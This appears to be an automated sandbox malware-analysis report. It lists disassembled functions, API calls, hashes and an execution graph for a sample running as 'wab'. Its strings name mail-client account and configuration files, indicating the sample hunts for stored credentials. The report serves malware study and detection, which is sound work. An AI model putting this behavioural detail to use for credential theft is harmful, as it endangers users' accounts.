                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                      • API String ID: 1475205934-1520055953
                                                                                                                                                                                                                      • Opcode ID: f99f7fba3b17cfdd29146b001efa70b1451ac7fa2b3c942f23c10e32b2f03d32
                                                                                                                                                                                                                      • Instruction ID: 9111016cd6016c34735aa51dada6c5887313937dcd7f3d89af50463ad74a5be5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f99f7fba3b17cfdd29146b001efa70b1451ac7fa2b3c942f23c10e32b2f03d32
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 552191B9A502486AEB2097A0EC82FEE7339EF80B14F000556F605EB1E0EBB15D85C75D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 35634B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 312 35634b39-35634b61 GetModuleHandleExW 313 35634b63-35634b76 GetProcAddress 312->313 314 35634b86-35634b8a 312->314 315 35634b85 313->315 316 35634b78-35634b83 313->316 317 35634b95-35634ba2 call 35632ada 314->317 318 35634b8c-35634b8f FreeLibrary 314->318 315->314 316->315 318->317
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,35634AEA,?,?,35634A8A,?,35642238,0000000C,35634BBD,00000000,00000000), ref: 35634B59
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 35634B6C
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,35634AEA,?,?,35634A8A,?,35642238,0000000C,35634BBD,00000000,00000000,00000001,35632082), ref: 35634B8F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                      • Opcode ID: 6386883c01d8744840ba936c82ff491fd6f1adc1a4edb021b6fb1f27e44cfba8
                                                                                                                                                                                                                      • Instruction ID: e4b4d5afd01fca3377d77e7d860a0c45b36fddc6ef71f5162c000395a156d235
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6386883c01d8744840ba936c82ff491fd6f1adc1a4edb021b6fb1f27e44cfba8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19F0A47191510CBBCB019F60D809F9DBFB9EF04791F410194F806A2161DF318942CA51
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 35639492 Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,35639C07,?,00000000,?,00000000,00000000), ref: 356394D4
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 35639590
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,35639C07,00000000,?,?,?,?,?,?,?,?,?,35639C07,?), ref: 356395AF
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,35639C07,00000000,?,?,?,?,?,?,?,?,?,35639C07,?), ref: 356395E8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 977765425-0
                                                                                                                                                                                                                      • Opcode ID: dfc495e0f4a05e0c50276159c60a8cd426c3fac46ef9fa998f0b8fcd2fa1f587
                                                                                                                                                                                                                      • Instruction ID: b4f1be552389875ef74053b7e2b58a3115f039da27a29eef7dfe3eeb1d898fb6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dfc495e0f4a05e0c50276159c60a8cd426c3fac46ef9fa998f0b8fcd2fa1f587
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3951C7B1A05209AFDB00CFA4DC92ADEBBF4FF09310F10411AE952E72A1DB709981CF51
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 35631E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,356310DF,?,?,?,00000000), ref: 35631E9A
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 35631EAC
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,356310DF,?,?,?,00000000), ref: 35631EB3
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,356310DF,?,?,?,00000000), ref: 35631EC8
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,356310DF), ref: 35631ED3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 493641738-0
                                                                                                                                                                                                                      • Opcode ID: 9f0719d337c041fe16cdc5a9c96d7ca69143ee0deaed95d5e20f009784213225
                                                                                                                                                                                                                      • Instruction ID: 01d4a0f2396572d2f7344dda6e26b1a76dadd12f00eb65a35e7823876ad6816d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f0719d337c041fe16cdc5a9c96d7ca69143ee0deaed95d5e20f009784213225
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AEF0892A1151147AD7212B29AC85E7F777CFFC5BA0F440019F508931A19B555853D2B6
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 356315DA Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,3563190E,?,?,00000000,?,00000000), ref: 35631643
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 3563165A
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,3563190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 35631661
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00001008,?), ref: 35631686
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcatlstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1475610065-0
                                                                                                                                                                                                                      • Opcode ID: 2380694c8e76a7332ff43ba67a41137c2febcc22080701f36efb31524be9f873
                                                                                                                                                                                                                      • Instruction ID: 9116f4ecc348279194b6c8bf34bc78f48b67c0292b9a957861423d34733a4ffb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2380694c8e76a7332ff43ba67a41137c2febcc22080701f36efb31524be9f873
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F521FC36A05204BBD704DF64EC85EEE77B8EF88720F14406BE504EB191EF34A542C7A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 35637153 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 3563715C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 3563717F
                                                                                                                                                                                                                        • Part of subcall function 356356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 35635702
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 356371A5
                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 356371C7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1794362364-0
                                                                                                                                                                                                                      • Opcode ID: 5efed1a7d15105573d0cefa3bd9b8f3161dec0910cf8b78d1d6286152d4df6f8
                                                                                                                                                                                                                      • Instruction ID: b23f6cc913ada01464ef7b2cc7777c4209923e25d70ae978814aea4daa7b3f72
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5efed1a7d15105573d0cefa3bd9b8f3161dec0910cf8b78d1d6286152d4df6f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4301D8B7A1B6197B23110AB69C89C7B6A7DEEC2DA13550169BC06D7220DF608D02C5B5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 35635CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,35631D66,00000000,00000000,?,35635C88,35631D66,00000000,00000000,00000000,?,35635E85,00000006,FlsSetValue), ref: 35635D13
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,35635C88,35631D66,00000000,00000000,00000000,?,35635E85,00000006,FlsSetValue,3563E190,FlsSetValue,00000000,00000364,?,35635BC8), ref: 35635D1F
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,35635C88,35631D66,00000000,00000000,00000000,?,35635E85,00000006,FlsSetValue,3563E190,FlsSetValue,00000000), ref: 35635D2D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                      • Opcode ID: d75bfaf758f12f47b204d90992423a832c610937eac4f68ba7ce4ee3bafaca27
                                                                                                                                                                                                                      • Instruction ID: ae58017e0c810177bad41147fe5cba059d4ce2a499ef3a3360401f0722bb8e47
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d75bfaf758f12f47b204d90992423a832c610937eac4f68ba7ce4ee3bafaca27
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701FC766273267BD3124E68DC9DE463768FF15BE1B510A20F906E7561DF20D402CBE4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 356369F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetOEMCP.KERNEL32(00000000,?,?,35636C7C,?), ref: 35636A1E
                                                                                                                                                                                                                      • GetACP.KERNEL32(00000000,?,?,35636C7C,?), ref: 35636A35
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: |lc5
                                                                                                                                                                                                                      • API String ID: 0-1493372475
                                                                                                                                                                                                                      • Opcode ID: 77ff6e0d633d34a013badcf8a27c28c35a13df163460f1665e15d9b64afe42bb
                                                                                                                                                                                                                      • Instruction ID: 45636ba591e570ef1446390baf460e57a391dbc7d1f94b9a804efa41ca56ebfc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77ff6e0d633d34a013badcf8a27c28c35a13df163460f1665e15d9b64afe42bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7F0AF7051520CABE740DFA8D449B6C3770BF40335FA04344E9389A6E1DF714886CB81
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:7.1%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:9.1%
                                                                                                                                                                                                                      Signature Coverage:1.1%
                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                      Total number of Limit Nodes:69
                                                                                                                                                                                                                      execution_graph 40788 441819 40791 430737 40788->40791 40790 441825 40792 430756 40791->40792 40802 43076d 40791->40802 40793 430774 40792->40793 40794 43075f 40792->40794 40796 43034a memcpy 40793->40796 40805 4169a7 11 API calls 40794->40805 40799 43077e 40796->40799 40797 4307ce 40798 430819 memset 40797->40798 40800 415b2c 11 API calls 40797->40800 40798->40802 40799->40797 40799->40802 40803 4307fa 40799->40803 40801 4307e9 40800->40801 40801->40798 40801->40802 40802->40790 40806 4169a7 11 API calls 40803->40806 40805->40802 40806->40802 37674 442ec6 19 API calls 37850 4152c6 malloc 37851 4152e2 37850->37851 37852 4152ef 37850->37852 37854 416760 11 API calls 37852->37854 37854->37851 37855 4232e8 37856 4232ef 37855->37856 37859 415b2c 37856->37859 37858 423305 37860 415b42 37859->37860 37865 415b46 37859->37865 37861 415b94 37860->37861 37862 415b5a 37860->37862 37860->37865 37866 4438b5 37861->37866 37864 415b79 memcpy 37862->37864 37862->37865 37864->37865 37865->37858 37867 4438d0 37866->37867 37875 4438c9 37866->37875 37880 415378 memcpy memcpy 37867->37880 37875->37865 38523 4466f4 38542 446904 38523->38542 38525 446700 GetModuleHandleA 38528 446710 __set_app_type __p__fmode __p__commode 38525->38528 38527 4467a4 38529 4467ac __setusermatherr 38527->38529 38530 4467b8 38527->38530 38528->38527 38529->38530 38543 4468f0 _controlfp 38530->38543 38532 4467bd _initterm __wgetmainargs _initterm 38534 44681e GetStartupInfoW 38532->38534 38535 446810 38532->38535 38536 446866 GetModuleHandleA 38534->38536 38544 41276d 38536->38544 38540 446896 exit 38541 44689d _cexit 38540->38541 38541->38535 38542->38525 38543->38532 38545 41277d 38544->38545 38587 4044a4 LoadLibraryW 38545->38587 38547 412785 38579 412789 38547->38579 38595 414b81 38547->38595 38550 4127c8 38601 412465 memset ??2@YAPAXI 38550->38601 38552 4127ea 38613 40ac21 38552->38613 38557 412813 38631 40dd07 memset 38557->38631 38558 412827 38636 40db69 memset 38558->38636 38561 412822 38657 4125b6 ??3@YAXPAX 38561->38657 38563 40ada2 _wcsicmp 38564 41283d 38563->38564 38564->38561 38567 412863 CoInitialize 38564->38567 38641 41268e 38564->38641 38661 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38567->38661 38571 41296f 38663 40b633 38571->38663 38574 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38578 412957 38574->38578 38584 4128ca 38574->38584 38578->38561 38579->38540 38579->38541 38580 4128d0 TranslateAcceleratorW 38581 412941 GetMessageW 38580->38581 38580->38584 38581->38578 38581->38580 38582 412909 IsDialogMessageW 38582->38581 38582->38584 38583 4128fd IsDialogMessageW 38583->38581 38583->38582 38584->38580 38584->38582 38584->38583 38585 41292b TranslateMessage DispatchMessageW 38584->38585 38586 41291f IsDialogMessageW 38584->38586 38585->38581 38586->38581 38586->38585 38588 4044cf GetProcAddress 38587->38588 38591 4044f7 38587->38591 38589 4044e8 FreeLibrary 38588->38589 38592 4044df 38588->38592 38590 4044f3 38589->38590 38589->38591 38590->38591 38593 404507 MessageBoxW 38591->38593 38594 40451e 38591->38594 38592->38589 38593->38547 38594->38547 38596 414b8a 38595->38596 38597 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38595->38597 38667 40a804 memset 38596->38667 38597->38550 38600 414b9e GetProcAddress 38600->38597 38603 4124e0 38601->38603 38602 412505 ??2@YAPAXI 38604 41251c 38602->38604 38606 412521 38602->38606 38603->38602 38689 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38604->38689 38678 444722 38606->38678 38612 41259b wcscpy 38612->38552 38694 40b1ab ??3@YAXPAX ??3@YAXPAX 38613->38694 38617 40ad4b 38626 40ad76 38617->38626 38718 40a9ce 38617->38718 38618 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38624 40ac5c 38618->38624 38620 40ace7 ??3@YAXPAX 38620->38624 38624->38617 38624->38618 38624->38620 38624->38626 38698 40a8d0 38624->38698 38710 4099f4 38624->38710 38625 40a8d0 7 API calls 38625->38626 38695 40aa04 38626->38695 38627 40ada2 38628 40adc9 38627->38628 38629 40adaa 38627->38629 38628->38557 38628->38558 38629->38628 38630 40adb3 _wcsicmp 38629->38630 38630->38628 38630->38629 38723 40dce0 38631->38723 38633 40dd3a GetModuleHandleW 38728 40dba7 38633->38728 38637 40dce0 3 API calls 38636->38637 38638 40db99 38637->38638 38800 40dae1 38638->38800 38814 402f3a 38641->38814 38643 412766 38643->38561 38643->38567 38644 4126d3 _wcsicmp 38645 4126a8 38644->38645 38645->38643 38645->38644 38647 41270a 38645->38647 38849 4125f8 7 API calls 38645->38849 38647->38643 38817 411ac5 38647->38817 38658 4125da 38657->38658 38659 4125f0 38658->38659 38660 4125e6 DeleteObject 38658->38660 38662 40b1ab ??3@YAXPAX ??3@YAXPAX 38659->38662 38660->38659 38661->38574 38662->38571 38664 40b640 38663->38664 38665 40b639 ??3@YAXPAX 38663->38665 38666 40b1ab ??3@YAXPAX ??3@YAXPAX 38664->38666 38665->38664 38666->38579 38668 40a83b GetSystemDirectoryW 38667->38668 38669 40a84c wcscpy 38667->38669 38668->38669 38674 409719 wcslen 38669->38674 38672 40a881 LoadLibraryW 38673 40a886 38672->38673 38673->38597 38673->38600 38675 409724 38674->38675 38676 409739 wcscat LoadLibraryW 38674->38676 38675->38676 38677 40972c wcscat 38675->38677 38676->38672 38676->38673 38677->38676 38679 444732 38678->38679 38680 444728 DeleteObject 38678->38680 38690 409cc3 38679->38690 38680->38679 38682 412551 38683 4010f9 38682->38683 38684 401130 38683->38684 38685 401134 GetModuleHandleW LoadIconW 38684->38685 38686 401107 wcsncat 38684->38686 38687 40a7be 38685->38687 38686->38684 38688 40a7d2 38687->38688 38688->38612 38688->38688 38689->38606 38693 409bfd memset wcscpy 38690->38693 38692 409cdb CreateFontIndirectW 38692->38682 38693->38692 38694->38624 38696 40aa14 38695->38696 38697 40aa0a ??3@YAXPAX 38695->38697 38696->38627 38697->38696 38699 40a8eb 38698->38699 38700 40a8df wcslen 38698->38700 38701 40a906 ??3@YAXPAX 38699->38701 38702 40a90f 38699->38702 38700->38699 38703 40a919 38701->38703 38704 4099f4 3 API calls 38702->38704 38705 40a932 38703->38705 38706 40a929 ??3@YAXPAX 38703->38706 38704->38703 38708 4099f4 3 API calls 38705->38708 38707 40a93e memcpy 38706->38707 38707->38624 38709 40a93d 38708->38709 38709->38707 38711 409a41 38710->38711 38712 4099fb malloc 38710->38712 38711->38624 38714 409a37 38712->38714 38715 409a1c 38712->38715 38714->38624 38716 409a30 ??3@YAXPAX 38715->38716 38717 409a20 memcpy 38715->38717 38716->38714 38717->38716 38719 40a9e7 38718->38719 38720 40a9dc ??3@YAXPAX 38718->38720 38722 4099f4 3 API calls 38719->38722 38721 40a9f2 38720->38721 38721->38625 38722->38721 38747 409bca GetModuleFileNameW 38723->38747 38725 40dce6 wcsrchr 38726 40dcf5 38725->38726 38727 40dcf9 wcscat 38725->38727 38726->38727 38727->38633 38748 44db70 38728->38748 38732 40dbfd 38751 4447d9 38732->38751 38735 40dc34 wcscpy wcscpy 38777 40d6f5 38735->38777 38736 40dc1f wcscpy 38736->38735 38739 40d6f5 3 API calls 38740 40dc73 38739->38740 38741 40d6f5 3 API calls 38740->38741 38742 40dc89 38741->38742 38743 40d6f5 3 API calls 38742->38743 38744 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38743->38744 38783 40da80 38744->38783 38747->38725 38749 40dbb4 memset memset 38748->38749 38750 409bca GetModuleFileNameW 38749->38750 38750->38732 38753 4447f4 38751->38753 38752 40dc1b 38752->38735 38752->38736 38753->38752 38754 444807 ??2@YAPAXI 38753->38754 38755 44481f 38754->38755 38756 444873 _snwprintf 38755->38756 38757 4448ab wcscpy 38755->38757 38790 44474a 8 API calls 38756->38790 38759 4448bb 38757->38759 38791 44474a 8 API calls 38759->38791 38760 4448a7 38760->38757 38760->38759 38762 4448cd 38792 44474a 8 API calls 38762->38792 38764 4448e2 38793 44474a 8 API calls 38764->38793 38766 4448f7 38794 44474a 8 API calls 38766->38794 38768 44490c 38795 44474a 8 API calls 38768->38795 38770 444921 38796 44474a 8 API calls 38770->38796 38772 444936 38797 44474a 8 API calls 38772->38797 38774 44494b 38798 44474a 8 API calls 38774->38798 38776 444960 ??3@YAXPAX 38776->38752 38778 44db70 38777->38778 38779 40d702 memset GetPrivateProfileStringW 38778->38779 38780 40d752 38779->38780 38781 40d75c WritePrivateProfileStringW 38779->38781 38780->38781 38782 40d758 38780->38782 38781->38782 38782->38739 38784 44db70 38783->38784 38785 40da8d memset 38784->38785 38786 40daac LoadStringW 38785->38786 38787 40dac6 38786->38787 38787->38786 38789 40dade 38787->38789 38799 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38787->38799 38789->38561 38790->38760 38791->38762 38792->38764 38793->38766 38794->38768 38795->38770 38796->38772 38797->38774 38798->38776 38799->38787 38810 409b98 GetFileAttributesW 38800->38810 38802 40daea 38803 40db63 38802->38803 38804 40daef wcscpy wcscpy GetPrivateProfileIntW 38802->38804 38803->38563 38811 40d65d GetPrivateProfileStringW 38804->38811 38806 40db3e 38812 40d65d GetPrivateProfileStringW 38806->38812 38808 40db4f 38813 40d65d GetPrivateProfileStringW 38808->38813 38810->38802 38811->38806 38812->38808 38813->38803 38850 40eaff 38814->38850 38818 411ae2 memset 38817->38818 38819 411b8f 38817->38819 38890 409bca GetModuleFileNameW 38818->38890 38831 411a8b 38819->38831 38821 411b0a wcsrchr 38822 411b22 wcscat 38821->38822 38823 411b1f 38821->38823 38891 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38822->38891 38823->38822 38825 411b67 38892 402afb 38825->38892 38829 411b7f 38948 40ea13 SendMessageW memset SendMessageW 38829->38948 38832 402afb 27 API calls 38831->38832 38833 411ac0 38832->38833 38834 4110dc 38833->38834 38835 41113e 38834->38835 38840 4110f0 38834->38840 38973 40969c LoadCursorW SetCursor 38835->38973 38837 411143 38847 40b633 ??3@YAXPAX 38837->38847 38974 4032b4 38837->38974 38992 444a54 38837->38992 38838 4110f7 _wcsicmp 38838->38840 38839 411157 38841 40ada2 _wcsicmp 38839->38841 38840->38835 38840->38838 38995 410c46 10 API calls 38840->38995 38844 411167 38841->38844 38842 4111af 38844->38842 38845 4111a6 qsort 38844->38845 38845->38842 38847->38839 38849->38645 38851 40eb10 38850->38851 38863 40e8e0 38851->38863 38854 40eb6c memcpy memcpy 38861 40ebb7 38854->38861 38855 40ebf2 ??2@YAPAXI ??2@YAPAXI 38857 40ec2e ??2@YAPAXI 38855->38857 38859 40ec65 38855->38859 38856 40d134 16 API calls 38856->38861 38857->38859 38859->38859 38873 40ea7f 38859->38873 38861->38854 38861->38855 38861->38856 38862 402f49 38862->38645 38864 40e8f2 38863->38864 38865 40e8eb ??3@YAXPAX 38863->38865 38866 40e900 38864->38866 38867 40e8f9 ??3@YAXPAX 38864->38867 38865->38864 38868 40e911 38866->38868 38869 40e90a ??3@YAXPAX 38866->38869 38867->38866 38870 40e931 ??2@YAPAXI ??2@YAPAXI 38868->38870 38871 40e921 ??3@YAXPAX 38868->38871 38872 40e92a ??3@YAXPAX 38868->38872 38869->38868 38870->38854 38871->38872 38872->38870 38874 40aa04 ??3@YAXPAX 38873->38874 38875 40ea88 38874->38875 38876 40aa04 ??3@YAXPAX 38875->38876 38877 40ea90 38876->38877 38878 40aa04 ??3@YAXPAX 38877->38878 38879 40ea98 38878->38879 38880 40aa04 ??3@YAXPAX 38879->38880 38881 40eaa0 38880->38881 38882 40a9ce 4 API calls 38881->38882 38883 40eab3 38882->38883 38884 40a9ce 4 API calls 38883->38884 38885 40eabd 38884->38885 38886 40a9ce 4 API calls 38885->38886 38887 40eac7 38886->38887 38888 40a9ce 4 API calls 38887->38888 38889 40ead1 38888->38889 38889->38862 38890->38821 38891->38825 38949 40b2cc 38892->38949 38894 402b0a 38895 40b2cc 27 API calls 38894->38895 38896 402b23 38895->38896 38897 40b2cc 27 API calls 38896->38897 38898 402b3a 38897->38898 38899 40b2cc 27 API calls 38898->38899 38900 402b54 38899->38900 38901 40b2cc 27 API calls 38900->38901 38902 402b6b 38901->38902 